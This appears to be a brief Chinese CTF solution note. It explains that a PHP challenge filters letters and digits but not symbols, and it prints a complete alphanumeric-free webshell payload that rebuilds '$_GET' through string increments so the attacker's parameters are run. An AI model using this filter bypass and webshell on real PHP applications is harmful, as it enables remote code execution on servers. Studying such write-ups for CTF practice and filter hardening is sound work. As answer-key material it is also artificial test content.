题目:
答案:
解析:
过滤了字母数字但是 '$' 、 '_'、 '='、';'、'+'、'{} '、'()'都没过滤可以用webshell自增绕过
构造:
$_=[].[];$_=$_[''];$__=$_[''];$___=$_[''];++$_;++$_;++$_;++$_;++$_;++$_;++$__;++$__;++$__;++$__;++$___;++$___;++$___;++$___;++$___;++$___;++$___;++$___;++$___;++$___;++$___;++$___;++$___;++$___;++$___;++$___;++$___;++$___;++$___;$_.=$__.$___;${'_'.$_}[_](${'_'.$_}[__]);
用url编码。